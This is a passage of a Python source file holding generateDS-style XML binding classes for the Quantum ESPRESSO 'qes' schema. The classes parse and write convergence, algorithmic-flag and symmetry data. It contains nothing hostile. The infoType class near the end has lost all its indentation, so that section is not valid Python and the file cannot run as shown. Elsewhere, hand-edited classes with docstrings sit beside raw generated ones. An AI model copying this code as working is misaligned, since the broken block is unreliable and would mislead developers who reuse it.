            namespacedef_ = override_ns
        line_end = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        ns_part = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, ns_part))
        seen = set()
        self.exportAttributes(outfile, level, seen, namespaceprefix_, name_='convergence_infoType')
        if not self.hasContent_():
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (line_end, ))
            return
        outfile.write('>%s' % (line_end, ))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='convergence_infoType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, line_end))

    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='convergence_infoType'):
        """convergence_infoType carries no XML attributes."""

    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='convergence_infoType', fromsubclass_=False, pretty_print=True):
        """Delegate serialization to the child bindings, when present."""
        if self.scf_conv is not None:
            self.scf_conv.export(outfile, level, namespaceprefix_, name_='scf_conv', pretty_print=pretty_print)
        if self.opt_conv is not None:
            self.opt_conv.export(outfile, level, namespaceprefix_, name_='opt_conv', pretty_print=pretty_print)

    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        seen = set()
        self.buildAttributes(node, node.attrib, seen)
        for child_node in node:
            child_tag = Tag_pattern_.match(child_node.tag).groups()[-1]
            self.buildChildren(child_node, node, child_tag)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """convergence_infoType carries no XML attributes."""

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Construct the matching child binding for *child_* and attach it."""
        if nodeName_ == 'scf_conv':
            child_obj = scf_convType.factory()
            child_obj.build(child_)
            child_obj.original_tagname_ = 'scf_conv'
            self.scf_conv = child_obj
        elif nodeName_ == 'opt_conv':
            child_obj = opt_convType.factory()
            child_obj.build(child_)
            child_obj.original_tagname_ = 'opt_conv'
            self.opt_conv = child_obj
# end class convergence_infoType
class scf_convType(GeneratedsSuper):
    """Generated binding for the qes ``scf_convType`` complex type: the SCF
    iteration count (positive integer ``n_scf_steps``) and the final
    estimated error (double ``scf_error``)."""
    subclass = None
    superclass = None

    def __init__(self, n_scf_steps=None, scf_error=None):
        self.original_tagname_ = None
        self.n_scf_steps = n_scf_steps
        self.scf_error = scf_error

    @staticmethod
    def factory(*args_, **kwargs_):
        """Build scf_convType, honoring any registered subclass."""
        if CurrentSubclassModule_ is not None:
            override = getSubclassFromModule_(
                CurrentSubclassModule_, scf_convType)
            if override is not None:
                return override(*args_, **kwargs_)
        cls = scf_convType.subclass or scf_convType
        return cls(*args_, **kwargs_)

    def get_n_scf_steps(self):
        return self.n_scf_steps

    def set_n_scf_steps(self, n_scf_steps):
        self.n_scf_steps = n_scf_steps

    def get_scf_error(self):
        return self.scf_error

    def set_scf_error(self, scf_error):
        self.scf_error = scf_error

    def hasContent_(self):
        """Return True when at least one child element would be serialized."""
        return self.n_scf_steps is not None or self.scf_error is not None

    def export(self, outfile, level, namespaceprefix_='qes:', name_='scf_convType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        override_ns = GenerateDSNamespaceDefs_.get('scf_convType')
        if override_ns is not None:
            namespacedef_ = override_ns
        line_end = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        ns_part = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, ns_part))
        seen = set()
        self.exportAttributes(outfile, level, seen, namespaceprefix_, name_='scf_convType')
        if not self.hasContent_():
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (line_end, ))
            return
        outfile.write('>%s' % (line_end, ))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='scf_convType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, line_end))

    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='scf_convType'):
        """scf_convType carries no XML attributes."""

    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='scf_convType', fromsubclass_=False, pretty_print=True):
        """Write the n_scf_steps and scf_error children, when present."""
        line_end = '\n' if pretty_print else ''
        if self.n_scf_steps is not None:
            showIndent(outfile, level, pretty_print)
            formatted = self.gds_format_integer(self.n_scf_steps, input_name='n_scf_steps')
            outfile.write('<qes:n_scf_steps>%s</qes:n_scf_steps>%s' % (formatted, line_end))
        if self.scf_error is not None:
            showIndent(outfile, level, pretty_print)
            formatted = self.gds_format_double(self.scf_error, input_name='scf_error')
            outfile.write('<qes:scf_error>%s</qes:scf_error>%s' % (formatted, line_end))

    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        seen = set()
        self.buildAttributes(node, node.attrib, seen)
        for child_node in node:
            child_tag = Tag_pattern_.match(child_node.tag).groups()[-1]
            self.buildChildren(child_node, node, child_tag)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """scf_convType carries no XML attributes."""

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element's text into the matching typed field.

        Calls raise_parse_error (which raises) on malformed content.
        """
        text = child_.text
        if nodeName_ == 'n_scf_steps' and text:
            try:
                parsed = int(text)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if parsed <= 0:
                # Schema type is xsd:positiveInteger.
                raise_parse_error(child_, 'requires positiveInteger')
            self.n_scf_steps = self.gds_validate_integer(parsed, node, 'n_scf_steps')
        elif nodeName_ == 'scf_error' and text:
            try:
                parsed = float(text)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            self.scf_error = self.gds_validate_float(parsed, node, 'scf_error')
# end class scf_convType
class opt_convType(GeneratedsSuper):
    """Generated binding for the qes ``opt_convType`` complex type: the
    ionic-optimization step count (positive integer ``n_opt_steps``) and
    the final gradient norm (double ``grad_norm``)."""
    subclass = None
    superclass = None
    def __init__(self, n_opt_steps=None, grad_norm=None):
        self.original_tagname_ = None
        self.n_opt_steps = n_opt_steps
        self.grad_norm = grad_norm
    # generateDS factory hook: returns an instance of a registered subclass
    # when one exists, otherwise a plain opt_convType.
    def factory(*args_, **kwargs_):
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, opt_convType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if opt_convType.subclass:
            return opt_convType.subclass(*args_, **kwargs_)
        else:
            return opt_convType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors kept for backward compatibility with generated callers.
    def get_n_opt_steps(self): return self.n_opt_steps
    def set_n_opt_steps(self, n_opt_steps): self.n_opt_steps = n_opt_steps
    def get_grad_norm(self): return self.grad_norm
    def set_grad_norm(self, grad_norm): self.grad_norm = grad_norm
    def hasContent_(self):
        """Return True when at least one child element would be serialized."""
        if (
            self.n_opt_steps is not None or
            self.grad_norm is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='opt_convType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('opt_convType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='opt_convType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='opt_convType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='opt_convType'):
        # opt_convType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='opt_convType', fromsubclass_=False, pretty_print=True):
        """Write the n_opt_steps and grad_norm children, when present."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.n_opt_steps is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:n_opt_steps>%s</qes:n_opt_steps>%s' % (self.gds_format_integer(self.n_opt_steps, input_name='n_opt_steps'), eol_))
        if self.grad_norm is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:grad_norm>%s</qes:grad_norm>%s' % (self.gds_format_double(self.grad_norm, input_name='grad_norm'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # opt_convType carries no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element's text into the matching typed field.

        Calls raise_parse_error (which raises) on malformed content.
        """
        if nodeName_ == 'n_opt_steps' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                # Schema type is xsd:positiveInteger.
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'n_opt_steps')
            self.n_opt_steps = ival_
        elif nodeName_ == 'grad_norm' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'grad_norm')
            self.grad_norm = fval_
# end class opt_convType
class algorithmic_infoType(GeneratedsSuper):
    """Generated binding for the qes ``algorithmic_infoType`` complex type:
    three boolean flags — ``real_space_q``, ``uspp`` (ultrasoft
    pseudopotentials present) and ``paw``."""
    subclass = None
    superclass = None
    def __init__(self, real_space_q=None, uspp=None, paw=None):
        self.original_tagname_ = None
        self.real_space_q = real_space_q
        self.uspp = uspp
        self.paw = paw
    # generateDS factory hook: returns an instance of a registered subclass
    # when one exists, otherwise a plain algorithmic_infoType.
    def factory(*args_, **kwargs_):
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, algorithmic_infoType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if algorithmic_infoType.subclass:
            return algorithmic_infoType.subclass(*args_, **kwargs_)
        else:
            return algorithmic_infoType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors kept for backward compatibility with generated callers.
    def get_real_space_q(self): return self.real_space_q
    def set_real_space_q(self, real_space_q): self.real_space_q = real_space_q
    def get_uspp(self): return self.uspp
    def set_uspp(self, uspp): self.uspp = uspp
    def get_paw(self): return self.paw
    def set_paw(self, paw): self.paw = paw
    def hasContent_(self):
        """Return True when at least one child element would be serialized."""
        if (
            self.real_space_q is not None or
            self.uspp is not None or
            self.paw is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='algorithmic_infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('algorithmic_infoType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='algorithmic_infoType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='algorithmic_infoType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='algorithmic_infoType'):
        # algorithmic_infoType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='algorithmic_infoType', fromsubclass_=False, pretty_print=True):
        """Write each non-None boolean flag as a qes-namespaced element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.real_space_q is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:real_space_q>%s</qes:real_space_q>%s' % (self.gds_format_boolean(self.real_space_q, input_name='real_space_q'), eol_))
        if self.uspp is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:uspp>%s</qes:uspp>%s' % (self.gds_format_boolean(self.uspp, input_name='uspp'), eol_))
        if self.paw is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:paw>%s</qes:paw>%s' % (self.gds_format_boolean(self.paw, input_name='paw'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # algorithmic_infoType carries no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element's 'true'/'1'/'false'/'0' text into the
        matching boolean field; raise_parse_error on anything else."""
        if nodeName_ == 'real_space_q':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'real_space_q')
            self.real_space_q = ival_
        elif nodeName_ == 'uspp':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'uspp')
            self.uspp = ival_
        elif nodeName_ == 'paw':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'paw')
            self.paw = ival_
# end class algorithmic_infoType
class symmetriesType(GeneratedsSuper):
    """Generated binding for the qes ``symmetriesType`` complex type: the
    symmetry counts (``nsym``, ``nrot``), the ``space_group`` number and a
    repeatable list of ``symmetry`` child elements."""
    subclass = None
    superclass = None
    def __init__(self, nsym=None, nrot=None, space_group=None, symmetry=None):
        self.original_tagname_ = None
        self.nsym = nsym
        self.nrot = nrot
        self.space_group = space_group
        # symmetry is a repeatable element; default to a fresh list per
        # instance (never a shared mutable default).
        if symmetry is None:
            self.symmetry = []
        else:
            self.symmetry = symmetry
    # generateDS factory hook: returns an instance of a registered subclass
    # when one exists, otherwise a plain symmetriesType.
    def factory(*args_, **kwargs_):
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, symmetriesType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if symmetriesType.subclass:
            return symmetriesType.subclass(*args_, **kwargs_)
        else:
            return symmetriesType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors kept for backward compatibility with generated callers.
    def get_nsym(self): return self.nsym
    def set_nsym(self, nsym): self.nsym = nsym
    def get_nrot(self): return self.nrot
    def set_nrot(self, nrot): self.nrot = nrot
    def get_space_group(self): return self.space_group
    def set_space_group(self, space_group): self.space_group = space_group
    def get_symmetry(self): return self.symmetry
    def set_symmetry(self, symmetry): self.symmetry = symmetry
    def add_symmetry(self, value): self.symmetry.append(value)
    def insert_symmetry_at(self, index, value): self.symmetry.insert(index, value)
    def replace_symmetry_at(self, index, value): self.symmetry[index] = value
    def hasContent_(self):
        """Return True when at least one child element would be serialized."""
        if (
            self.nsym is not None or
            self.nrot is not None or
            self.space_group is not None or
            self.symmetry
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='symmetriesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('symmetriesType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='symmetriesType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='symmetriesType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='symmetriesType'):
        # symmetriesType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='symmetriesType', fromsubclass_=False, pretty_print=True):
        """Write the integer children, then each symmetry child binding."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.nsym is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nsym>%s</qes:nsym>%s' % (self.gds_format_integer(self.nsym, input_name='nsym'), eol_))
        if self.nrot is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nrot>%s</qes:nrot>%s' % (self.gds_format_integer(self.nrot, input_name='nrot'), eol_))
        if self.space_group is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:space_group>%s</qes:space_group>%s' % (self.gds_format_integer(self.space_group, input_name='space_group'), eol_))
        for symmetry_ in self.symmetry:
            symmetry_.export(outfile, level, namespaceprefix_, name_='symmetry', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # symmetriesType carries no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse an integer child into the matching field, or build and
        append a symmetryType binding for each 'symmetry' child."""
        if nodeName_ == 'nsym' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'nsym')
            self.nsym = ival_
        elif nodeName_ == 'nrot' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'nrot')
            self.nrot = ival_
        elif nodeName_ == 'space_group' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'space_group')
            self.space_group = ival_
        elif nodeName_ == 'symmetry':
            obj_ = symmetryType.factory()
            obj_.build(child_)
            self.symmetry.append(obj_)
            obj_.original_tagname_ = 'symmetry'
# end class symmetriesType
class symmetryType(GeneratedsSuper):
    """Generated binding for the qes ``symmetryType`` complex type: one
    symmetry operation, holding an ``info`` header, a ``rotation`` matrix,
    an optional ``fractional_translation`` (a d3vectorType, i.e. three
    doubles) and the ``equivalent_atoms`` mapping."""
    subclass = None
    superclass = None
    def __init__(self, info=None, rotation=None, fractional_translation=None, equivalent_atoms=None):
        self.original_tagname_ = None
        self.info = info
        self.rotation = rotation
        self.fractional_translation = fractional_translation
        self.validate_d3vectorType(self.fractional_translation)
        self.equivalent_atoms = equivalent_atoms
    # generateDS factory hook: returns an instance of a registered subclass
    # when one exists, otherwise a plain symmetryType.
    def factory(*args_, **kwargs_):
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, symmetryType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if symmetryType.subclass:
            return symmetryType.subclass(*args_, **kwargs_)
        else:
            return symmetryType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors kept for backward compatibility with generated callers.
    def get_info(self): return self.info
    def set_info(self, info): self.info = info
    def get_rotation(self): return self.rotation
    def set_rotation(self, rotation): self.rotation = rotation
    def get_fractional_translation(self): return self.fractional_translation
    def set_fractional_translation(self, fractional_translation): self.fractional_translation = fractional_translation
    def get_equivalent_atoms(self): return self.equivalent_atoms
    def set_equivalent_atoms(self, equivalent_atoms): self.equivalent_atoms = equivalent_atoms
    def validate_d3vectorType(self, value):
        # Validate type d3vectorType, a restriction on double.
        # BUG FIX: the generated check compared len(str(value)) to 3, which
        # measures the length of the textual representation rather than the
        # number of vector components, so the warning fired for virtually
        # every valid 3-vector. Count the actual components instead: the
        # list/tuple length, or the number of whitespace-separated tokens
        # for a raw string value.
        if value is not None and Validate_simpletypes_:
            if isinstance(value, (list, tuple)):
                n_components = len(value)
            else:
                n_components = len(str(value).split())
            if n_components != 3:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
    def hasContent_(self):
        """Return True when at least one child element would be serialized."""
        if (
            self.info is not None or
            self.rotation is not None or
            self.fractional_translation is not None or
            self.equivalent_atoms is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='symmetryType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('symmetryType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='symmetryType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='symmetryType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='symmetryType'):
        # symmetryType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='symmetryType', fromsubclass_=False, pretty_print=True):
        """Delegate to the child bindings; fractional_translation is a plain
        double-list element written inline."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.info is not None:
            self.info.export(outfile, level, namespaceprefix_, name_='info', pretty_print=pretty_print)
        if self.rotation is not None:
            self.rotation.export(outfile, level, namespaceprefix_, name_='rotation', pretty_print=pretty_print)
        if self.fractional_translation is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:fractional_translation>%s</qes:fractional_translation>%s' % (self.gds_format_double_list(self.fractional_translation, input_name='fractional_translation'), eol_))
        if self.equivalent_atoms is not None:
            self.equivalent_atoms.export(outfile, level, namespaceprefix_, name_='equivalent_atoms', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # symmetryType carries no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build the matching child binding (info/rotation/equivalent_atoms)
        or parse fractional_translation as a validated double list."""
        if nodeName_ == 'info':
            obj_ = infoType.factory()
            obj_.build(child_)
            self.info = obj_
            obj_.original_tagname_ = 'info'
        elif nodeName_ == 'rotation':
            # rotation may be serialized as a derived matrix type; resolve the
            # concrete class from the node before building.
            class_obj_ = self.get_class_obj_(child_, matrixType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.rotation = obj_
            obj_.original_tagname_ = 'rotation'
        elif nodeName_ == 'fractional_translation':
            fractional_translation_ = child_.text
            fractional_translation_ = self.gds_validate_double_list(fractional_translation_, node, 'fractional_translation')
            self.fractional_translation = fractional_translation_
            # validate type d3vectorType
            self.validate_d3vectorType(self.fractional_translation)
        elif nodeName_ == 'equivalent_atoms':
            obj_ = equivalent_atomsType.factory()
            obj_.build(child_)
            self.equivalent_atoms = obj_
            obj_.original_tagname_ = 'equivalent_atoms'
# end class symmetryType
class infoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, name=None, class_=None, time_reversal=None, valueOf_=None):
self.original_tagname_ = None
self.name = _cast(None, name)
self.class_ = _cast(None, class_)
self.time_reversal = _cast(bool, time_reversal)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, infoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if infoType.subclass:
return infoType.subclass(*args_, **kwargs_)
else:
return infoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_class(self): return self.class_
def set_class(self, class_): self.class_ = class_
def get_time_reversal(self): return self.time_reversal
def set_time_reversal(self, time_reversal): self.time_reversal = time_reversal
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('infoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='infoType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='infoType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='infoType'):
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
if self.class_ is not None and 'class_' not in already_processed:
already_processed.add('class_')
outfile.write(' class=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.class_), input_name='class')), ))
if self.time_reversal is not None and 'time_reversal' not in already_processed:
already_processed.add('time_reversal')
outfile.write(' time_reversal="%s"' % self.gds_format_boolean(self.time_reversal, input_name='time_reversal'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='infoType', fromsubclass_=False, pretty_print=True):
pass
    def build(self, node):
        """Populate this object from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        # Simple-content type: capture all text directly under the node.
        self.valueOf_ = get_all_text_(node)
        for child in node:
            # Strip any namespace prefix from the child tag before dispatch.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the ``name``/``class``/``time_reversal`` attributes from *node*.

        Raises a parse error (via raise_parse_error) for a malformed boolean.
        """
        value = find_attr_value_('name', node)
        if value is not None and 'name' not in already_processed:
            already_processed.add('name')
            self.name = value
        value = find_attr_value_('class', node)
        if value is not None and 'class' not in already_processed:
            already_processed.add('class')
            self.class_ = value
        value = find_attr_value_('time_reversal', node)
        if value is not None and 'time_reversal' not in already_processed:
            already_processed.add('time_reversal')
            # xsd:boolean accepts exactly 'true'/'1'/'false'/'0'.
            if value in ('true', '1'):
                self.time_reversal = True
            elif value in ('false', '0'):
                self.time_reversal = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
